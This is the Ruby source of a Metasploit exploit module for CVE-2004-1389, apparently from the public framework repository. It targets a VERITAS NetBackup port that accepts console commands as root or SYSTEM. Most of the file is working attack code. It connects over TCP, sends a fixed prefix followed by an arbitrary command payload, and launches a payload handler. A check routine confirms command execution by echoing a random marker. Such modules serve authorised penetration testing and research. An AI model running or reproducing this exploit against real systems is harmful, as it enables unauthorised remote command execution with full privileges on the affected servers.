GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
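# Metasploit module for CVE-2004-1389 (VERITAS NetBackup).
#
# Per the module description, NetBackup opens an ephemeral port while an
# administrator is authenticated, and that port accepts console commands as
# root or SYSTEM from any source address. The module talks to that port over
# plain TCP (RHOST/RPORT come from the Tcp mixin).
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  # Fixed bytes that both #check and #exploit send ahead of the command line.
  # Their protocol meaning is not documented in this module.
  COMMAND_PREFIX = "\x20\x20\x201\x20\x20\x20\x20\x20\x201\n".freeze

  # Registers the module metadata (name, references, payload constraints,
  # targets) with the framework.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'VERITAS NetBackup Remote Command Execution',
        'Description' => %q{
          This module allows arbitrary command execution on an
          ephemeral port opened by Veritas NetBackup, whilst an
          administrator is authenticated. The port is opened and
          allows direct console access as root or SYSTEM from
          any source address.
        },
        'Author' => [ 'aushack' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2004-1389' ],
          [ 'OSVDB', '11026' ],
          [ 'BID', '11494' ]
        ],
        'Privileged' => true,
        'Platform' => %w{linux unix win},
        'Arch' => ARCH_CMD,
        'Payload' => {
          'Space' => 1024,
          'BadChars' => '',
          'DisableNops' => true,
          'Compat' =>
                  {
                    'PayloadType' => 'cmd',
                    'RequiredCmd' => 'generic perl telnet',
                  }
        },
        'Targets' => [
          ['Automatic', {}],
        ],
        'DisclosureDate' => '2004-10-21',
        'DefaultTarget' => 0,
        # Reliability, stability and side effects have not been assessed for
        # this module; treat it as unvetted when planning an authorised test.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Determines whether the service runs commands sent to it.
  #
  # This is an active check: it asks the target to `echo` a random
  # 10-character marker and looks for that marker in the first response.
  #
  # @return [Exploit::CheckCode] Vulnerable when the marker is echoed back,
  #   Unknown when the service sent nothing (no data is not evidence that the
  #   host is patched, e.g. the port may only be open while an administrator
  #   is logged in), Safe when a response arrived without the marker.
  def check
    marker = rand_text_alphanumeric(10)

    connect
    sock.put("#{COMMAND_PREFIX}echo #{marker}\n")
    banner = sock.get_once.to_s

    # An empty read used to be reported as Safe, which overstated the result.
    return Exploit::CheckCode::Unknown if banner.empty?
    return Exploit::CheckCode::Vulnerable if banner.include?(marker)

    Exploit::CheckCode::Safe
  ensure
    # Close the socket even when put/get_once raises.
    disconnect
  end

  # Sends the encoded command payload after the fixed prefix, prints the first
  # response, and hands control to the payload handler.
  #
  # @return [void]
  def exploit
    connect

    sock.put("#{COMMAND_PREFIX}#{payload.encoded}\n")
    res = sock.get_once

    print_status(res.to_s)

    handler
  ensure
    # Close the socket on every path, including when an exception is raised.
    disconnect
  end
end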